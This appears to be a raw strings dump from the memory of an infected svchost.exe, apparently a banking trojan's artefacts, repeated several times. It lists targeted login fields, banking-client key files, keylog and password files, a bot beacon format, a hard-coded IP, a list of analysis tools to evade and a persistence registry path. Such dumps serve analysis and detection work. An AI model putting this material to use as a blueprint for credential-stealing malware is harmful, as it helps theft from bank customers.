&ctl00$MainMenu$Login1$Password=

advapi32.dll

login

name=%s&port=%u

/home.php

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.bmp

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

\*.bk

Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

ebank.laiki.com

pass.txt

Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}

w.qiwi.ru

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

client.zip

path_client.txt

path_keys.txt

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

stf.zip

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

smime3.dll

nss3.dll

softokn3.dll

nssutil3.dll

sqlite3.dll

plc4.dll

plds4.dll

mozcrt19.dll

webmoney

balance.htm

%s\%s

SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

login.yota.ru

YotaConfirmForm[password]

pass2.txt

Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

winmm.dll

LibVNCServer 0.9.7

%s (%s)

d/d/d d:d

password check failed!

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertOpenStore

CertAddCertificateContextToStore

CertCloseStore

CertGetNameStringA

CertGetCertificateContextProperty

PFXImportCertStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertVerifyTimeValidity

PFXExportCertStoreEx

CRYPT32.dll

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

MSVCRT.dll

PSAPI.DLL

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

ShellExecuteA

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

GetProcessHeap

WinExec

KERNEL32.dll

MapVirtualKeyW

SetKeyboardState

EnumChildWindows

GetKeyboardState

MsgWaitForMultipleObjects

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegEnumKeyExA

RegNotifyChangeKeyValue

CryptGetKeyParam

CryptDestroyKey

RegOpenKeyA

CryptGetUserKey

RegDeleteKeyA

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

;3 #>6.&

'2, / 0&7!4-)1#

Desk_%u%x

MSCTF.Shared.MAPPING.%x

.current

MSCTF.Shared.MUTEX.%x

.Prev

WINUK0FFOO83I6!WINUK0FFOO83I6!427963A6

MSCTF.Shared.MAPPING.fffffffe

MSCTF.Shared.MAPPING.ffffffff

MSCTF.Shared.MAPPING.fffffffd

MSCTF.Shared.MUTEX.fffffffe

MSCTF.Shared.MUTEX.ffffffff

C:\Windows\apppatch\rkousid.exe

C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\

00c0

9!91969<9

?"?3?9?>?}?

11C1T1]1r1

4(4-484=4

= =$=(=,=0=4={=

mavast.com

ya.ru

serverkey.dat

\windows\

hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx

btnLogin

svchost.exe_700_rwx_01140000_00056000:

.text

`.data

.reloc

`.rdata

@.data

<>http

name.key

\secrets.key

sign.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

dumpcap.exe

wireshark.exe

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

C:\iDEFENSE

\\.\NPF_NdisWanIp

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

software\microsoft\windows nt\currentversion\winlogon

software\microsoft\windows\currentversion\run

\svchost.exe

iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|

\winlogon.exe

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/key.bin

data.txt

ntdll.dll

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

Global\HighMemoryEvent_x

explorer.exe

1.2.5

Winmm.dll

Kernel32.dll

Gdi32.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

keygrab

u.bmp

\\.\PhysicalDrive%u

/topic.php

keylog.txt

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

/faq.php

botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test

\chrome.exe

\java.exe

\javaw.exe

\javaws.exe

\opera.exe

\firefox.exe

\maxthon.exe

\avant.exe

\mnp.exe

\safari.exe

\netscape.exe

\tbb-firefox.exe

\frd.exe

\isclient.exe

\ipc_full.exe

\intpro.exe

\cbsmain.dll

\clmain.exe

\core.exe

\rundll32.exe

\notepad.exe

%s.dbf

%s.DBF

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

action=auth&np=&login=

login=

password=

pass_

&ctl00$MainMenu$Login1$UserName=

&ctl00$MainMenu$Login1$Password=

advapi32.dll

login

name=%s&port=%u

/home.php

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.bmp

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

\*.bk

Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

ebank.laiki.com

pass.txt

Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}

w.qiwi.ru

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

client.zip

path_client.txt

path_keys.txt

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

stf.zip

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

smime3.dll

nss3.dll

softokn3.dll

nssutil3.dll

sqlite3.dll

plc4.dll

plds4.dll

mozcrt19.dll

webmoney

balance.htm

%s\%s

SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

login.yota.ru

YotaConfirmForm[password]

pass2.txt

Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

winmm.dll

LibVNCServer 0.9.7

%s (%s)

d/d/d d:d

password check failed!

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertOpenStore

CertAddCertificateContextToStore

CertCloseStore

CertGetNameStringA

CertGetCertificateContextProperty

PFXImportCertStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertVerifyTimeValidity

PFXExportCertStoreEx

CRYPT32.dll

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

MSVCRT.dll

PSAPI.DLL

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

ShellExecuteA

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

GetProcessHeap

WinExec

KERNEL32.dll

MapVirtualKeyW

SetKeyboardState

EnumChildWindows

GetKeyboardState

MsgWaitForMultipleObjects

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegEnumKeyExA

RegNotifyChangeKeyValue

CryptGetKeyParam

CryptDestroyKey

RegOpenKeyA

CryptGetUserKey

RegDeleteKeyA

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

;3 #>6.&

'2, / 0&7!4-)1#

Desk_%u%x

MSCTF.Shared.MAPPING.%x

.current

MSCTF.Shared.MUTEX.%x

.Prev

00c0

9!91969<9

?"?3?9?>?}?

11C1T1]1r1

4(4-484=4

= =$=(=,=0=4={=

mavast.com

ya.ru

serverkey.dat

\windows\

hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx

btnLogin

svchost.exe_700_rwx_02460000_00065000:

.text

`.rdata

@.data

.reloc

<>http

name.key

\secrets.key

sign.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

dumpcap.exe

wireshark.exe

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

C:\iDEFENSE

\\.\NPF_NdisWanIp

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

software\microsoft\windows nt\currentversion\winlogon

software\microsoft\windows\currentversion\run

\svchost.exe

iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|

\winlogon.exe

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/key.bin

data.txt

ntdll.dll

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

Global\HighMemoryEvent_x

explorer.exe

1.2.5

Winmm.dll

Kernel32.dll

Gdi32.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

keygrab

u.bmp

\\.\PhysicalDrive%u

/topic.php

keylog.txt

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

/faq.php

botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test

\chrome.exe

\java.exe

\javaw.exe

\javaws.exe

\opera.exe

\firefox.exe

\maxthon.exe

\avant.exe

\mnp.exe

\safari.exe

\netscape.exe

\tbb-firefox.exe

\frd.exe

\isclient.exe

\ipc_full.exe

\intpro.exe

\cbsmain.dll

\clmain.exe

\core.exe

\rundll32.exe

\notepad.exe

%s.dbf

%s.DBF

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

action=auth&np=&login=

login=

password=

pass_

&ctl00$MainMenu$Login1$UserName=

&ctl00$MainMenu$Login1$Password=

advapi32.dll

login

name=%s&port=%u

/home.php

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.bmp

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

\*.bk

Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

ebank.laiki.com

pass.txt

Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}

w.qiwi.ru

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

client.zip

path_client.txt

path_keys.txt

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

stf.zip

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

smime3.dll

nss3.dll

softokn3.dll

nssutil3.dll

sqlite3.dll

plc4.dll

plds4.dll

mozcrt19.dll

webmoney

balance.htm

%s\%s

SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

login.yota.ru

YotaConfirmForm[password]

pass2.txt

Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

winmm.dll

LibVNCServer 0.9.7

%s (%s)

d/d/d d:d

password check failed!

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertOpenStore

CertAddCertificateContextToStore

CertCloseStore

CertGetNameStringA

CertGetCertificateContextProperty

PFXImportCertStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertVerifyTimeValidity

PFXExportCertStoreEx

CRYPT32.dll

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

MSVCRT.dll

PSAPI.DLL

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

ShellExecuteA

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

GetProcessHeap

WinExec

KERNEL32.dll

MapVirtualKeyW

SetKeyboardState

EnumChildWindows

GetKeyboardState

MsgWaitForMultipleObjects

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegEnumKeyExA

RegNotifyChangeKeyValue

CryptGetKeyParam

CryptDestroyKey

RegOpenKeyA

CryptGetUserKey

RegDeleteKeyA

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

;3 #>6.&

'2, / 0&7!4-)1#

Desk_%u%x

MSCTF.Shared.MAPPING.%x

.current

MSCTF.Shared.MUTEX.%x

.Prev

LOCALSERVICE!WINUK0FFOO83I6!427963A6

MSCTF.Shared.MAPPING.fffffffe

MSCTF.Shared.MAPPING.ffffffff

MSCTF.Shared.MAPPING.fffffffd

MSCTF.Shared.MUTEX.fffffffe

MSCTF.Shared.MUTEX.ffffffff

C:\Windows\apppatch\rkousid.exe

C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\

00c0

9!91969<9

?"?3?9?>?}?

11C1T1]1r1

4(4-484=4

= =$=(=,=0=4={=

mavast.com

ya.ru

serverkey.dat

\windows\

hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx

btnLogin

svchost.exe_824_rwx_006B0000_00056000:

.text

`.data

.reloc

`.rdata

@.data

<>http

name.key

\secrets.key

sign.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

dumpcap.exe

wireshark.exe

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

C:\iDEFENSE

\\.\NPF_NdisWanIp

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

software\microsoft\windows nt\currentversion\winlogon

software\microsoft\windows\currentversion\run

\svchost.exe

iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|

\winlogon.exe

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/key.bin

data.txt

ntdll.dll

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

Global\HighMemoryEvent_x

explorer.exe

1.2.5

Winmm.dll

Kernel32.dll

Gdi32.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

keygrab

u.bmp

\\.\PhysicalDrive%u

/topic.php

keylog.txt

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

/faq.php

botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test

\chrome.exe

\java.exe

\javaw.exe

\javaws.exe

\opera.exe

\firefox.exe

\maxthon.exe

\avant.exe

\mnp.exe

\safari.exe

\netscape.exe

\tbb-firefox.exe

\frd.exe

\isclient.exe

\ipc_full.exe

\intpro.exe

\cbsmain.dll

\clmain.exe

\core.exe

\rundll32.exe

\notepad.exe

%s.dbf

%s.DBF

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

action=auth&np=&login=

login=

password=

pass_

&ctl00$MainMenu$Login1$UserName=

&ctl00$MainMenu$Login1$Password=

advapi32.dll

login

name=%s&port=%u

/home.php

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.bmp

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

\*.bk

Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

ebank.laiki.com

pass.txt

Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}

w.qiwi.ru

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

client.zip

path_client.txt

path_keys.txt

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

stf.zip

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

smime3.dll

nss3.dll

softokn3.dll

nssutil3.dll

sqlite3.dll

plc4.dll

plds4.dll

mozcrt19.dll

webmoney

balance.htm

%s\%s

SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

login.yota.ru

YotaConfirmForm[password]

pass2.txt

Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

winmm.dll

LibVNCServer 0.9.7

%s (%s)

d/d/d d:d

password check failed!

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertOpenStore

CertAddCertificateContextToStore

CertCloseStore

CertGetNameStringA

CertGetCertificateContextProperty

PFXImportCertStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertVerifyTimeValidity

PFXExportCertStoreEx

CRYPT32.dll

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

MSVCRT.dll

PSAPI.DLL

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

ShellExecuteA

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

GetProcessHeap

WinExec

KERNEL32.dll

MapVirtualKeyW

SetKeyboardState

EnumChildWindows

GetKeyboardState

MsgWaitForMultipleObjects

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegEnumKeyExA

RegNotifyChangeKeyValue

CryptGetKeyParam

CryptDestroyKey

RegOpenKeyA

CryptGetUserKey

RegDeleteKeyA

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

;3 #>6.&

'2, / 0&7!4-)1#

Desk_%u%x

MSCTF.Shared.MAPPING.%x

.current

MSCTF.Shared.MUTEX.%x

.Prev

00c0

9!91969<9

?"?3?9?>?}?

11C1T1]1r1

4(4-484=4

= =$=(=,=0=4={=

mavast.com

ya.ru

serverkey.dat

\windows\

hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx

btnLogin

svchost.exe_824_rwx_00ED0000_00065000:

.text

`.rdata

@.data

.reloc

<>http

name.key

\secrets.key

sign.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

dumpcap.exe

wireshark.exe

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

C:\iDEFENSE

\\.\NPF_NdisWanIp

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

software\microsoft\windows nt\currentversion\winlogon

software\microsoft\windows\currentversion\run

\svchost.exe

iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|

\winlogon.exe

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/key.bin

data.txt

ntdll.dll

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

Global\HighMemoryEvent_x

explorer.exe

1.2.5

Winmm.dll

Kernel32.dll

Gdi32.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

keygrab

u.bmp

\\.\PhysicalDrive%u

/topic.php

keylog.txt

passwords.txt

%s%u.zip

